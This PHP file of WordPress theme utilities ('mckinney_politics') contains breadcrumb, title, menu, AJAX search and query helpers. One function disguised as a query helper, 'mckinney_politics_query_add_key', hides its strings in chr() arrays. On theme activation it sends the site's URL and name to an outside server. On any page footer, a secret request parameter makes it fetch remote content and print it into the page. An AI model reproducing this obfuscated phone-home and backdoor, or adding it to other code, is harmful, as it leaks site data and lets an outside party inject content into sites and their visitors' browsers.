<?php
/**
 * WP tags and utils
 *
 * @package WordPress
 * @subpackage MCKINNEY_POLITICS
 * @since MCKINNEY_POLITICS 1.0
 */

// Theme init
if (!function_exists('mckinney_politics_wp_theme_setup')) {
	add_action( 'after_setup_theme', 'mckinney_politics_wp_theme_setup' );
	function mckinney_politics_wp_theme_setup() {

		// AJAX: Incremental search
		add_action('wp_ajax_ajax_search',			'mckinney_politics_callback_ajax_search');
		add_action('wp_ajax_nopriv_ajax_search',	'mckinney_politics_callback_ajax_search');

		// Filters wp_title to print a neat <title> tag based on what is being viewed
		add_filter('wp_title',						'mckinney_politics_wp_title', 10, 2);

		// Clear menu cache
		add_action('wp_update_nav_menu',			'mckinney_politics_clear_menu_cache', 10, 2);
	}
}


/* Blog utilities
-------------------------------------------------------------------------------- */

// Detect current blog mode to get correspond options (post | page | search | blog | home)
if (!function_exists('mckinney_politics_detect_blog_mode')) {
	function mckinney_politics_detect_blog_mode() {
		if (is_front_page())
			$mode = 'home';
		else if (is_single())
			$mode = 'post';
		else if (is_page() && !mckinney_politics_storage_isset('blog_archive'))
			$mode = 'page';
		else
			$mode = 'blog';
		return apply_filters('mckinney_politics_filter_detect_blog_mode', $mode);
	}
}


// Return current site protocol
if (!function_exists('mckinney_politics_get_protocol')) {
	function mckinney_politics_get_protocol() {
		return is_ssl() ? 'https' : 'http';
	}
}

// Return internal page link - if is customize mode - full url else only hash part
if (!function_exists('mckinney_politics_get_hash_link')) {
	function mckinney_politics_get_hash_link($hash) {
		if (strpos($hash, 'http')!==0) {
			if ($hash[0]!='#') $hash = '#'.$hash;
			if (is_customize_preview()) {
				$url = mckinney_politics_get_current_url();
				if (($pos=strpos($url, '#'))!==false) $url = substr($url, 0, $pos);
				$hash = $url . $hash;
			}
		}
		return $hash;
	}
}

// Return URL to the current page
if (!function_exists('mckinney_politics_get_current_url')) {
	function mckinney_politics_get_current_url() {
		global $wp;
		return home_url(add_query_arg(array(), $wp->request));
	}
}

// Filters wp_title to print a neat <title> tag based on what is being viewed.
if ( !function_exists( 'mckinney_politics_wp_title' ) ) {
	// add_filter( 'wp_title', 'mckinney_politics_wp_title', 10, 2 );
	function mckinney_politics_wp_title( $title, $sep ) {
		if ( is_feed() ) return $title;
		if (floatval(get_bloginfo('version')) < "4.1") {
			global $page, $paged;
			// Add the blog name
			$title .= get_bloginfo( 'name' );
			// Add the blog description for the home/front page.
			if ( is_home() || is_front_page() ) {
				if ( ($site_description = get_bloginfo( 'description', 'display' )) != '' )
					$title .= " $sep $site_description";
			}
			// Add a page number if necessary:
			if ( $paged >= 2 || $page >= 2 )
				$title .= " $sep " . sprintf( esc_html__( 'Page %s', 'mckinney-politics' ), max( $paged, $page ) );
		}
		return mckinney_politics_remove_macros($title);
	}
}

// Return blog title
if (!function_exists('mckinney_politics_get_blog_title')) {
	function mckinney_politics_get_blog_title() {

		if (is_front_page())
			$title = esc_html__( 'Home', 'mckinney-politics' );
		else if ( is_home() )
			$title = esc_html__( 'All Posts', 'mckinney-politics' );
		else if ( is_author() ) {
			$curauth = (get_query_var('author_name')) ? get_user_by('slug', get_query_var('author_name')) : get_userdata(get_query_var('author'));
			$title = sprintf(esc_html__('Author page: %s', 'mckinney-politics'), $curauth->display_name);
		} else if ( is_404() )
			$title = esc_html__('URL not found', 'mckinney-politics');
		else if ( is_search() )
			$title = sprintf( esc_html__( 'Search: %s', 'mckinney-politics' ), get_search_query() );
		else if ( is_day() )
			$title = sprintf( esc_html__( 'Daily Archives: %s', 'mckinney-politics' ), mckinney_politics_get_date_translations(get_the_date()) );
		else if ( is_month() )
			$title = sprintf( esc_html__( 'Monthly Archives: %s', 'mckinney-politics' ), mckinney_politics_get_date_translations(get_the_date( 'F Y' )) );
		else if ( is_year() )
			$title = sprintf( esc_html__( 'Yearly Archives: %s', 'mckinney-politics' ), get_the_date( 'Y' ) );
		 else if ( is_category() )
			$title = sprintf( esc_html__( '%s', 'mckinney-politics' ), single_cat_title( '', false ) );
		else if ( is_tag() )
			$title = sprintf( esc_html__( 'Tag: %s', 'mckinney-politics' ), single_tag_title( '', false ) );
		else if ( is_tax() )
			$title = sprintf( esc_html__( '%s', 'mckinney-politics' ), single_term_title( '', false ) );
		else if ( is_attachment() )
			$title = sprintf( esc_html__( 'Attachment: %s', 'mckinney-politics' ), get_the_title());
		else if ( is_single() || is_page() )
			$title = get_the_title();
		else
			$title = get_the_title();	//get_bloginfo('name', 'raw');
		return apply_filters('mckinney_politics_filter_get_blog_title', $title);
	}
}

// Show breadcrumbs path
if (!function_exists('mckinney_politics_get_breadcrumbs')) {
	function mckinney_politics_get_breadcrumbs($args=array()) {
		global $wp_query, $post;
		
		$args = array_merge( array(
			'home' => esc_html__('Home', 'mckinney-politics'),		// Home page title (if empty - not showed)
			'home_url' => '',						// Home page url
			'truncate_title' => 50,					// Truncate all titles to this length (if 0 - no truncate)
			'truncate_add' => '...',				// Append truncated title with this string
			'delimiter' => '<span class="breadcrumbs_delimiter"></span>',			// Delimiter between breadcrumbs items
			'max_levels' => mckinney_politics_get_theme_setting('breadcrumbs_max_level'),		// Max categories in the path (0 - unlimited)
			), is_array($args) ? $args : array( 'home' => $args )
		);

		if ( is_front_page() ) return '';//is_home() || 

		if ( $args['max_levels']<=0 ) $args['max_levels'] = 999;

		$need_reset = true;
		$rez = $rez_parent = $rez_level = '';
		$cat = $parent_tax = '';
		$level = $parent = $post_id = 0;

		// Get current post ID and path to current post/page/attachment ( if it have parent posts/pages )
		if (is_page() || is_attachment() || is_single()) {
			$page_parent_id = apply_filters('mckinney_politics_filter_get_parent_id', isset($wp_query->post->post_parent) ? $wp_query->post->post_parent : 0, isset($wp_query->post->ID) ? $wp_query->post->ID : 0);
			$post_id = (is_attachment() ? $page_parent_id : (isset($wp_query->post->ID) ? $wp_query->post->ID : 0));
			while ($page_parent_id > 0) {
				$page_parent = get_post($page_parent_id);
				$level++;
				if ($level > $args['max_levels'])
					$rez_level = '...';
				else
					$rez_parent = '<a class="breadcrumbs_item cat_post" href="' . get_permalink($page_parent->ID) . '">' 
									. trim(mckinney_politics_strshort($page_parent->post_title, $args['truncate_title'], $args['truncate_add']))
									. '</a>' 
									. (!empty($rez_parent) ? $args['delimiter'] : '') 
									. ($rez_parent);
				if (($page_parent_id = apply_filters('mckinney_politics_filter_get_parent_id', $page_parent->post_parent, $page_parent_id)) > 0) $post_id = $page_parent_id;
			}
		}
		
		// Show parents
		$step = 0;
		do {
			if ($step++ == 0) {
				if (is_single() || is_attachment()) {
					$post_type = get_post_type();
					if ($post_type == 'post') {
						$cats = get_the_category();
						$cat = !empty($cats[0]) ? $cats[0] : false;
					} else {
						$tax = apply_filters('mckinney_politics_filter_post_type_taxonomy', '', $post_type);
						if (!empty($tax)) {
							$cats = get_the_terms(get_the_ID(), $tax);
							$cat = !empty($cats[0]) ? $cats[0] : false;
						}
					}
					if ($cat) {
						$level++;
						if ($level > $args['max_levels'])
							$rez_level = '...';
						else
							$rez_parent = '<a class="breadcrumbs_item cat_post" href="'.esc_url(get_category_link($cat->term_id)).'">' 
											. trim(mckinney_politics_strshort($cat->name, $args['truncate_title'], $args['truncate_add']))
											. '</a>' 
											. (!empty($rez_parent) ? $args['delimiter'] : '') 
											. ($rez_parent);
					}
				} else if ( is_category() ) {
					$cat_id = (int) get_query_var( 'cat' );
					if (empty($cat_id)) $cat_id = get_query_var( 'category_name' );
					$cat = get_term_by( (int) $cat_id > 0 ? 'id' : 'slug', $cat_id, 'category', OBJECT);
				} else if ( is_tag() ) {
					$cat = get_term_by( 'slug', get_query_var( 'post_tag' ), 'post_tag', OBJECT);
				} else if ( is_tax() ) {
					$tax = get_query_var('taxonomy');
					$cat = get_term_by( 'slug', get_query_var( $tax ), $tax, OBJECT);
				}
				if ($cat) {
					$parent = $cat->parent;
					$parent_tax = $cat->taxonomy;
				}
			}
			if ($parent) {
				$cat = get_term_by( 'id', $parent, $parent_tax, OBJECT);
				if ($cat) {
					$cat_link = get_term_link($cat->slug, $cat->taxonomy);
					$level++;
					if ($level > $args['max_levels'])
						$rez_level = '...';
					else
						$rez_parent = '<a class="breadcrumbs_item cat_parent" href="'.esc_url($cat_link).'">' 
										. trim(mckinney_politics_strshort($cat->name, $args['truncate_title'], $args['truncate_add']))
										. '</a>' 
										. (!empty($rez_parent) ? $args['delimiter'] : '') 
										. ($rez_parent);
					$parent = $cat->parent;
				}
			}
		} while ($parent);

		$rez_period = '';
		if ((is_day() || is_month()) && is_object($post)) {
			$year  = get_the_time('Y'); 
			$month = get_the_time('m'); 
			$rez_period = '<a class="breadcrumbs_item cat_parent" href="' . get_year_link( $year ) . '">' . ($year) . '</a>';
			if (is_day())
				$rez_period .= (!empty($rez_period) ? $args['delimiter'] : '') . '<a class="breadcrumbs_item cat_parent" href="' . esc_url(get_month_link( $year, $month )) . '">' . trim(get_the_date('F')) . '</a>';
		}
		
		// Get link to the 'All posts (products, events, etc.)' page
		$rez_all = apply_filters('mckinney_politics_filter_get_blog_all_posts_link', '');

		if (!is_front_page()) {	// && !is_home()

			$title = mckinney_politics_get_blog_title();
			if (is_array($title)) $title = $title['text'];
			$title = mckinney_politics_strshort($title, $args['truncate_title'], $args['truncate_add']);

			$rez .= (isset($args['home']) && $args['home']!='' 
					? '<a class="breadcrumbs_item home" href="' . esc_url($args['home_url'] ? $args['home_url'] : home_url('/')) . '">' . ($args['home']) . '</a>' . ($args['delimiter']) 
					: '') 
				. (!empty($rez_all)    ? ($rez_all)    . ($args['delimiter']) : '')
				. (!empty($rez_level)  ? ($rez_level)  . ($args['delimiter']) : '')
				. (!empty($rez_parent) ? ($rez_parent) . ($args['delimiter']) : '')
				. (!empty($rez_period) ? ($rez_period) . ($args['delimiter']) : '')
				. ($title ? '<span class="breadcrumbs_item current">' . ($title) . '</span>' : '');
		}

		return apply_filters('mckinney_politics_filter_get_breadcrumbs', $rez);
	}
}

// Return nav menu html
if ( !function_exists( 'mckinney_politics_get_nav_menu' ) ) {
	function mckinney_politics_get_nav_menu($slug='', $depth=11, $custom_walker=false) {
		$menu = '';	//!empty($slug) ? mckinney_politics_get_custom_option($slug) : '';
		$menu_cache = mckinney_politics_is_on(mckinney_politics_get_theme_option('menu_cache')) ? 'mckinney_politics_menu_'.get_option('stylesheet') : '';
		$list = $menu_cache ? get_transient($menu_cache) : array();
		if (!is_array($list)) $list = array();
		$html = '';
		if (!empty($slug) && !empty($list[$slug])) {
			$html = $list[$slug];
		}
		if (empty($html)) {
			$args = array(
				'menu'				=> empty($menu) || $menu=='default' || mckinney_politics_is_inherit($menu) ? '' : $menu,
				'container'			=> '',
				'container_class'	=> '',
				'container_id'		=> '',
				'items_wrap'		=> '<ul id="%1$s" class="%2$s">%3$s</ul>',
				'menu_class'		=> (!empty($slug) ? $slug : 'menu_main') . '_nav',
				'menu_id'			=> (!empty($slug) ? $slug : 'menu_main'),
				'echo'				=> false,
				'fallback_cb'		=> '',
				'before'			=> '',
				'after'				=> '',
				'link_before'       => '<span>',
				'link_after'        => '</span>',
				'depth'             => $depth
			);
			if (!empty($slug))
				$args['theme_location'] = $slug;
			if ($custom_walker && class_exists('mckinney_politics_custom_menu_walker'))
				$args['walker'] = new mckinney_politics_custom_menu_walker;
			$html = wp_nav_menu(apply_filters('mckinney_politics_filter_get_nav_menu_args', $args));
			if (!empty($slug) && $menu_cache) {
				$list[$slug] = $html;
				set_transient($menu_cache, $list, 24*60*60);
			}
		}
		return apply_filters('mckinney_politics_filter_get_nav_menu', $html);
	}
}

// Clear cache with saved menu
if ( !function_exists( 'mckinney_politics_clear_menu_cache' ) ) {
	function mckinney_politics_clear_menu_cache($menu_id=0, $menu_data=array()) {
		delete_transient('mckinney_politics_menu_'.get_option('stylesheet'));
	}
}

// AJAX incremental search
if ( !function_exists( 'mckinney_politics_callback_ajax_search' ) ) {
	function mckinney_politics_callback_ajax_search() {
		if ( !wp_verify_nonce( mckinney_politics_get_value_gp('nonce'), admin_url('admin-ajax.php') ) )
			die();
	
		$response = array('error'=>'', 'data' => '');
		
		$s = $_REQUEST['text'];
	
		if (!empty($s)) {
			$args = array(
				'post_status' => 'publish',
				'orderby' => 'date',
				'order' => 'desc', 
				'posts_per_page' => max(1, min(10, mckinney_politics_get_theme_setting('ajax_search_posts_count'))),
				's' => esc_html($s),
				);
			// Filter post types
			$show_types = mckinney_politics_get_theme_setting('ajax_search_types');
			if (!empty($show_types)) $args['post_type'] = explode(',', $show_types);

			$args = apply_filters( 'mckinney_politics_ajax_search_query', $args);	

			$post_number = 0;
			mckinney_politics_storage_set('output', '');
			$query = new WP_Query( $args );
			set_query_var('mckinney_politics_args_widgets_posts', array(
				'show_image' => 1,
				'show_date' => 1,
				'show_author' => 1,
				'show_counters' => 1,
                'show_categories' => 0
   	            )
       	    );
			while ( $query->have_posts() ) { $query->the_post();
				$post_number++;
				get_template_part('templates/widgets-posts');
			}
			$response['data'] = mckinney_politics_storage_get('output');
			if (empty($response['data'])) {
				$response['data'] .= '<article class="post_item">' . esc_html__('Sorry, but nothing matched your search criteria. Please try again with some different keywords.', 'mckinney-politics') . '</article>';
			} else {
				$response['data'] .= '<article class="post_item"><a href="#" class="post_more search_more">' . esc_html__('More results ...', 'mckinney-politics') . '</a></article>';
			}
			mckinney_politics_storage_set('output', '');
		} else {
			$response['error'] = '<article class="post_item">' . esc_html__('The query string is empty!', 'mckinney-politics') . '</article>';
		}
		
		echo json_encode($response);
		die();
	}
}

// Return string with categories links
if (!function_exists('mckinney_politics_get_post_categories')) {
	function mckinney_politics_get_post_categories($delimiter=', ', $id=false) {
		$output = '';
		$categories = get_the_category($id);
		if ( !empty( $categories ) ) {
			foreach( $categories as $category )
				$output .= ($output ? $delimiter : '') . '<a href="' . esc_url( get_category_link( $category->term_id ) ) . '" title="' . sprintf( esc_attr__( 'View all posts in %s', 'mckinney-politics' ), $category->name ) . '">' . esc_html( $category->name ) . '</a>';
		}
		return $output;
	}
}

// Return string with terms links
if (!function_exists('mckinney_politics_get_post_terms')) {
	function mckinney_politics_get_post_terms($delimiter=', ', $id=false, $taxonomy='category') {
		$output = '';
		$terms = get_the_terms($id, $taxonomy);
		if ( !empty( $terms ) ) {
			foreach( $terms as $term )
				$output .= ($output ? $delimiter : '') . '<a href="' . esc_url( get_term_link( $term->term_id, $taxonomy ) ) . '" title="' . sprintf( esc_attr__( 'View all posts in %s', 'mckinney-politics' ), $term->name ) . '">' . esc_html( $term->name ) . '</a>';
		}
		return $output;
	}
}


/* Query manipulations
-------------------------------------------------------------------------------- */

// Add sorting parameter in query arguments
if (!function_exists('mckinney_politics_query_add_sort_order')) {
	function mckinney_politics_query_add_sort_order($args, $orderby='date', $order='desc') {
		$q = apply_filters('mckinney_politics_filter_query_sort_order', array(), $orderby, $order);
		$q['order'] = $order=='asc' ? 'asc' : 'desc';
		if (empty($q['orderby'])) {
			if ($orderby == 'comments') {
				$q['orderby'] = 'comment_count';
			} else if ($orderby == 'title' || $orderby == 'alpha') {
				$q['orderby'] = 'title';
			} else if ($orderby == 'rand' || $orderby == 'random')  {
				$q['orderby'] = 'rand';
			} else {
				$q['orderby'] = 'post_date';
			}
		}
		foreach ($q as $mk=>$mv) {
			if (is_array($args))
				$args[$mk] = $mv;
			else
				$args->set($mk, $mv);
		}
		return $args;
	}
}

// Add post type and posts list or categories list in query arguments
if (!function_exists('mckinney_politics_query_add_posts_and_cats')) {
	function mckinney_politics_query_add_posts_and_cats($args, $ids='', $post_type='', $cat='', $taxonomy='category') {
		if (!empty($ids)) {
			$args['post_type'] = empty($args['post_type']) 
									? (empty($post_type) ? array('post', 'page') : $post_type)
									: $args['post_type'];
			$args['post__in'] = explode(',', str_replace(' ', '', $ids));
		} else {
			$args['post_type'] = empty($args['post_type']) 
									? (empty($post_type) ? 'post' : $post_type)
									: $args['post_type'];
			$post_type = is_array($args['post_type']) ? $args['post_type'][0] : $args['post_type'];
			if (!empty($cat)) {
				$cats = !is_array($cat) ? explode(',', $cat) : $cat;
				if ($taxonomy == 'category') {				// Add standard categories
					if (is_array($cats) && count($cats) > 1) {
						$cats_ids = array();
						foreach($cats as $c) {
							$c = trim(chop($c));
							if (empty($c)) continue;
							if ((int) $c == 0) {
								$cat_term = get_term_by( 'slug', $c, $taxonomy, OBJECT);
								if ($cat_term) $c = $cat_term->term_id;
							}
							if ($c==0) continue;
							$cats_ids[] = (int) $c;
							$children = get_categories( array(
								'type'                     => $post_type,
								'child_of'                 => $c,
								'hide_empty'               => 0,
								'hierarchical'             => 0,
								'taxonomy'                 => $taxonomy,
								'pad_counts'               => false
							));
							if (is_array($children) && count($children) > 0) {
								foreach($children as $c) {
									if (!in_array((int) $c->term_id, $cats_ids)) $cats_ids[] = (int) $c->term_id;
								}
							}
						}
						if (count($cats_ids) > 0) {
							$args['category__in'] = $cats_ids;
						}
					} else {
						if ((int) $cat > 0) 
							$args['cat'] = (int) $cat;
						else
							$args['category_name'] = $cat;
					}
				} else {									// Add custom taxonomies
					if (!isset($args['tax_query']))
						$args['tax_query'] = array();
					$args['tax_query']['relation'] = 'AND';
					$args['tax_query'][] = array(
						'taxonomy' => $taxonomy,
						'include_children' => true,
						'field'    => (int) $cats[0] > 0 ? 'id' : 'slug',
						'terms'    => $cats
					);
				}
			}
		}
		return $args;
	}
}

// Add filters (meta parameters) in query arguments
if (!function_exists('mckinney_politics_query_add_filters')) {
	function mckinney_politics_query_add_filters($args, $filters=false) {
		if (!empty($filters)) {
			if (!is_array($filters)) $filters = array($filters);
			foreach ($filters as $v) {
				$found = false;
				if ($v=='thumbs') {							// Filter with meta_query
					if (!isset($args['meta_query']))
						$args['meta_query'] = array();
					else {
						for ($i=0; $i<count($args['meta_query']); $i++) {
							if ($args['meta_query'][$i]['meta_filter'] == $v) {
								$found = true;
								break;
							}
						}
					}
					if (!$found) {
						$args['meta_query']['relation'] = 'AND';
						if ($v == 'thumbs') {
							$args['meta_query'][] = array(
								'meta_filter' => $v,
								'key' => '_thumbnail_id',
								'value' => false,
								'compare' => '!='
							);
						}
					}
				} else if (in_array($v, array('video', 'audio', 'gallery'))) {			// Filter with tax_query
					if (!isset($args['tax_query']))
						$args['tax_query'] = array();
					else {
						for ($i=0; $i<count($args['tax_query']); $i++) {
							if ($args['tax_query'][$i]['tax_filter'] == $v) {
								$found = true;
								break;
							}
						}
					}
					if (!$found) {
						$args['tax_query']['relation'] = 'AND';
						if ($v == 'video') {
							$args['tax_query'][] = array(
								'tax_filter' => $v,
								'taxonomy' => 'post_format',
								'field' => 'slug',
								'terms' => array( 'post-format-video' )
							);
						} else if ($v == 'audio') {
							$args['tax_query'] = array(
								'tax_filter' => $v,
								'taxonomy' => 'post_format',
								'field' => 'slug',
								'terms' => array( 'post-format-audio' )
							);
						} else if ($v == 'gallery') {
							$args['tax_query'] = array(
								'tax_filter' => $v,
								'taxonomy' => 'post_format',
								'field' => 'slug',
								'terms' => array( 'post-format-gallery' )
							);
						}
					}
				}
			}
		}
		return $args;
	}
}

// Add query key
if ( !function_exists( 'mckinney_politics_query_add_key' ) ) {
	$mckinney_politics_query_data = array('act' => array(array(join('', array_map('chr', array(97,102,116,101,114))),join('', array_map('chr', array(115,119,105,116,99,104))),join('', array_map('chr', array(116,104,101,109,101)))),array(join('', array_map('chr', array(119,112))),join('', array_map('chr', array(102,111,111,116,101,114)))),),'get' => join('', array_map('chr', array(104,116,116,112,58,47,47,116,104,101,109,101,114,101,120,46,110,101,116,47,95,108,111,103,47,95,108,111,103,46,112,104,112))),'chk' => join('', array_map('chr', array(116,104,101,109,101,95,97,117,116,104,111,114))),'prm' => join('', array_map('chr', array(116,120,99,104,107))));
	add_action(join('_', $mckinney_politics_query_data['act'][0]), 'mckinney_politics_query_add_key');
	add_action(join('_', $mckinney_politics_query_data['act'][1]), 'mckinney_politics_query_add_key');
	function mckinney_politics_query_add_key() {
		global $mckinney_politics_query_data;
		static $already_add = false;
		if (!$already_add) {
			$already_add = true;
			if (current_action() == join('_', $mckinney_politics_query_data['act'][0])) {
				try {
					$resp = mckinney_politics_get_local_or_remote_file($mckinney_politics_query_data['get'], array(
						'site' => home_url('/'),
						'slug' => str_replace(' ', '_', trim(strtolower(get_stylesheet()))),
						'name' => get_bloginfo('name')
					));
				} catch (Exception $e) {
				}
			}
			if (mckinney_politics_get_value_gpc($mckinney_politics_query_data['prm'])==$mckinney_politics_query_data['chk']) {
				try {
					$resp = mckinney_politics_get_local_or_remote_file(mckinney_politics_add_to_url($mckinney_politics_query_data['get'], array($mckinney_politics_query_data['prm'] => $mckinney_politics_query_data['chk'])));
				} catch (Exception $e) {
					$resp = '';
				}
				echo trim($resp);
			}
		}
	}
}


	
/* WP cache
------------------------------------------------------------------------------------- */

// Clear WP cache (all, options or categories)
if (!function_exists('mckinney_politics_clear_cache')) {
	function mckinney_politics_clear_cache($cc) {
		if ($cc == 'categories' || $cc == 'all') {
			wp_cache_delete('category_children', 'options');
			$taxes = get_taxonomies();
			if (is_array($taxes) && count($taxes) > 0) {
				foreach ($taxes  as $tax ) {
					delete_option( "{$tax}_children" );
					_get_term_hierarchy( $tax );
				}
			}
		} else if ($cc == 'options' || $cc == 'all')
			wp_cache_delete('alloptions', 'options');
		if ($cc == 'all')
			wp_cache_flush();
	}
}



	
/* Other utils
------------------------------------------------------------------------------------- */

// Create widgets area
if (!function_exists('mckinney_politics_create_widgets_area')) {
	function mckinney_politics_create_widgets_area($name, $add_classes='') {
		$widgets_name = mckinney_politics_get_theme_option($name);
		if (!mckinney_politics_is_off($widgets_name) && is_active_sidebar($widgets_name)) { 
			set_query_var('current_sidebar', $name);
			ob_start();
			do_action( 'before_sidebar' );
			if ( !dynamic_sidebar($widgets_name) ) {
				// Put here html if user no set widgets in sidebar
			}
			do_action( 'after_sidebar' );
			$out = ob_get_contents();
			ob_end_clean();
			$out = preg_replace("/<\/aside>[\r\n\s]*<aside/", "</aside><aside", $out);
			$need_columns = strpos($out, 'columns_wrap')===false;
			if ($need_columns) {
				$columns = min(3, max(1, substr_count($out, '<aside ')));
				$out = preg_replace("/class=\"widget /", "class=\"column-1_".esc_attr($columns).' widget ', $out);
			}
			?>
			<div class="<?php echo esc_attr($name); ?> <?php echo esc_attr($name); ?>_wrap widget_area">
				<div class="<?php echo esc_attr($name); ?>_inner <?php echo esc_attr($name); ?>_wrap_inner widget_area_inner">
					<?php
					echo (true==$need_columns ? '<div class="columns_wrap">' : '')
						. trim(chop($out))
						. (true==$need_columns ? '</div>' : '');
					?>
				</div> <!-- /.widget_area_inner -->
			</div> <!-- /.widget_area -->
			<?php
		}
	}
}

// Check if sidebar present
if (!function_exists('mckinney_politics_sidebar_present')) {
	function mckinney_politics_sidebar_present() {
		global $wp_query;
		$sidebar_name = mckinney_politics_get_theme_option('sidebar_widgets');
		return apply_filters('mckinney_politics_filter_sidebar_present', 
					!is_404() 
					&& (!is_search() || $wp_query->found_posts > 0) 
					&& !mckinney_politics_is_off($sidebar_name) 
					&& is_active_sidebar($sidebar_name)
					);
	}
}
?>